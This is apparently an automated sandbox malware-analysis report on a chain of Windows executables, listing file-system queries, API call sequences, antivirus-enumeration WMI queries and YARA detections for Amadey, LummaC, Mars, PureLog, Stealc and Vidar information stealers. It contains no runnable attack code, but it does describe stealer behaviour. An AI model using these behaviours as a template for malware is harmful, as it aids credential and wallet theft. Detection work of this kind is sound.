                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\win32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\_brotli.cp311-win_amd64.pyd VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\zstandard VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\zstandard VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\zstandard VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\zstandard VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\_hashlib.pyd VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_0096A5B5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,13_2_0096A5B5
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_009461F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,13_2_009461F0
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_0097E68E _free,_free,_free,GetTimeZoneInformation,_free,13_2_0097E68E
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_009493D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,13_2_009493D0
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                      Source: UD49QH6.exe, 00000010.00000003.1481927220.0000000001337000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.2079863840.0000000001341000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.2079619439.0000000001315000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.5079116984.000000000131E000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1481927220.0000000001322000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1508453490.0000000001337000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1508453490.0000000001314000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.2079265890.0000000001338000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.5078654939.0000000001317000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                                      Stealing of Sensitive Information

                                      barindex
                                      Yara detected Amadey
                                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                      Yara detected Amadeys Clipper DLL
                                      Source: Yara matchFile source: 14.2.futors.exe.3e0000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 13.0.amnew.exe.940000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 14.0.futors.exe.3e0000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 34.2.TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.170000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 15.0.futors.exe.3e0000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 13.2.amnew.exe.940000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 3.2.rapes.exe.240000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 0.2.M6gQuZPvgY.exe.200000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 2.2.rapes.exe.240000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000003.00000002.1046270812.0000000000241000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000022.00000002.1634294018.0000000000171000.00000040.00000001.01000000.00000018.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000002.00000002.1039110891.0000000000241000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\amnew[1].exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe, type: DROPPED
                                      Yara detected LummaC Stealer
                                      Source: Yara matchFile source: Process Memory Space: UD49QH6.exe PID: 6024, type: MEMORYSTR
                                      Source: Yara matchFile source: 48.2.cronikxqqq.exe.3c89550.0.raw.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 49.2.cronikxqqq.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 49.2.cronikxqqq.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000031.00000002.1772447973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                      Yara detected Mars stealer
                                      Source: Yara matchFile source: 17.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 17.0.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000011.00000002.1518189012.000000000043C000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000011.00000000.1442265227.000000000043C000.00000080.00000001.01000000.0000000E.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000006.00000003.5645957689.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000011.00000002.1518022147.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\m0wsoI3[1].exe, type: DROPPED
                                      Yara detected PureLog Stealer
                                      Source: Yara matchFile source: 48.2.cronikxqqq.exe.3c89550.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 48.0.cronikxqqq.exe.870000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 48.2.cronikxqqq.exe.3c89550.0.raw.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000030.00000000.1635997111.0000000000872000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
                                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\cronikxqqq[1].exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe, type: DROPPED
                                      Yara detected Stealc
                                      Source: Yara matchFile source: 17.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000011.00000002.1518022147.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                                      Yara detected Vidar stealer
                                      Source: Yara matchFile source: 17.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000011.00000002.1518022147.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                                      Source: Yara matchFile source: Process Memory Space: m0wsoI3.exe PID: 5132, type: MEMORYSTR
                                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                      Found many strings related to Crypto-Wallets (likely being stolen)
